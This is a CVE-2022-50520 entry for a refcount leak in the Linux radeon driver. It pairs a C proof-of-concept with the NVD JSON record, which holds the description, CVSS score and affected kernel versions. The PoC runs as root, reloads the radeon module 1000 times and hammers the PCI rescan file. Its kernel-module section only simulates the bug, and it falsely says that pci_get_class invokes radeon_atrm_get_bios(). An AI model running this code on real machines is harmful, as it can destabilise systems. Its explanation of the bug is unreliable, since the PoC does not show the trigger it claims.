CVE-2022-50520

// PoC: Triggering PCI device refcount leak in radeon_atrm_get_bios() // This PoC demonstrates how to trigger the vulnerability by repeatedly // loading/unloading the radeon driver module #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <sys/stat.h> // Method 1: Trigger via modprobe loop // Requires root privileges and a system with Radeon GPU void trigger_via_modprobe_loop() { printf("Triggering refcount leak via radeon module reload...\n"); for (int i = 0; i < 1000; i++) { // Unload radeon module (may fail if in use) system("rmmod radeon 2>/dev/null"); usleep(100000); // Reload radeon module system("modprobe radeon 2>/dev/null"); usleep(100000); } printf("Module reloaded 1000 times. Check refcount:\n"); system("ls /sys/bus/pci/devices/ | head -5"); } // Method 2: Trigger via sysfs hotplug events void trigger_via_sysfs_rescan() { printf("Triggering refcount leak via PCI rescan...\n"); FILE *f = fopen("/sys/bus/pci/rescan", "w"); if (f) { for (int i = 0; i < 100; i++) { fprintf(f, "1\n"); fflush(f); usleep(50000); } fclose(f); } } // Method 3: Direct kernel module to trigger the vulnerable function // (requires writing a kernel module) /* #include <linux/module.h> #include <linux/pci.h> static int __init trigger_refcount_leak_init(void) { struct pci_dev *pdev = NULL; // This call internally invokes radeon_atrm_get_bios() path // Each call leaks one reference on the matched PCI device while ((pdev = pci_get_class(PCI_CLASS_DISPLAY_VGA << 8, pdev)) != NULL) { if (pdev->vendor == PCI_VENDOR_ID_ATI) { // Simulating the vulnerable code path // In real vulnerable code: break without pci_dev_put(pdev) printk(KERN_INFO "Found ATI device: %s\n", pci_name(pdev)); // MISSING: pci_dev_put(pdev); <-- This is the bug break; // Bug: refcount leak here } } return 0; } static void __exit trigger_refcount_leak_exit(void) { printk(KERN_INFO "Module unloaded\n"); } module_init(trigger_refcount_leak_init); module_exit(trigger_refcount_leak_exit); MODULE_LICENSE("GPL"); */ int main() { if (getuid() != 0) { printf("This PoC requires root privileges.\n"); return 1; } trigger_via_modprobe_loop(); trigger_via_sysfs_rescan(); printf("PoC execution complete.\n"); printf("Monitor system stability and dmesg for errors.\n"); return 0; }

{"cve": {"id": "CVE-2022-50520", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:35.747", "lastModified": "2026-03-17T14:13:15.580", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/radeon: Fix PCI device refcount leak in radeon_atrm_get_bios()\n\nAs comment of pci_get_class() says, it returns a pci_device with its\nrefcount increased and decreased the refcount for the input parameter\n@from if it is not NULL.\n\nIf we break the loop in radeon_atrm_get_bios() with 'pdev' not NULL, we\nneed to call pci_dev_put() to decrease the refcount. Add the missing\npci_dev_put() to avoid refcount leak."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.2.29", "versionEndExcluding": "3.3", "matchCriteriaId": "F383FEE6-EB49-4647-818D-34A96777C7EF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.2.60", "versionEndExcluding": "3.3", "matchCriteriaId": "DAF30915-4DA7-4B6C-B502-C4B363CDA3D9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.4.12", "versionEndExcluding": "3.5", "matchCriteriaId": "FFC2E965-2219-4289-9B55-8332085F6327"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.5.5", "versionEndExcluding": "3.6", "matchCriteriaId": "7AFAFCA0-FA28-41D2-A7EF-1BA7FB2A4732"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.6.1", "versionEndExcluding": "4.9.337", "matchCriteriaId": "0A7D8869-49B6-4968-BDAA-F6836C646CB3"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.10", "versionEndExcluding": "4.14.303", "matchCriteriaId": "1E7450AD-4739-46F0-B81B-C02E7B35A97B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.270", "matchCriteriaId": "AE8904A3-99BE-4E49-9682-1F90A6373F4F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.229", "matchCriteriaId": "A0C0D95E-414A-445E-941B-3EF6A4D3A093"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.163", "matchCriteriaId": "D05D31FC-BD74-4F9E-B1D8-9CED62BE6F65"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.86", "matchCriteriaId": "47237296-55D1-4ED4-8075-D00FC85A61EE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.0.16", "matchCriteriaId": "C720A569-3D93-4D77-95F6-E2B3A3267D9F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1", "versionEndExcluding": "6.1.2", "matchCriteriaId": "77239F4B-6BB2-4B9E-A654-36A52396116C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:3.6:-:*:*:*:*:*:*", "matchCriteriaId": "E7D72FF4-3906-4585-B39A-A9B194F53204"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:3.6:rc3:*:*:*:*:*:*", "matchCriteriaId": "E0FCBD80-8462-4642-B2F0-54896776CF07"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:3.6:rc4:*:*:*:*:*:*", "matchCriteriaId": "42F72762-D825-4B81-93BB-5B7F54313F46"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:3.6:rc5:*:*:*:*:*:*", "matchCriteriaId": "41FDE042-F389-4580-BEBB-EBAB4F562477"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:3.6:rc6:*:*:*:*:*:*", "matchCriteriaId": "329C7DD0-9CEA-4D15-B0FE-B3565EE53A63"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:3.6:rc7:*:*:*:*:*:*", "matchCriteriaId": "A6067C5D-29B3-4EE2-BDCA-3F204F25F1C0"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/1079df6acf56f99d86b0081a38c84701412cc90e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.or ... (truncated)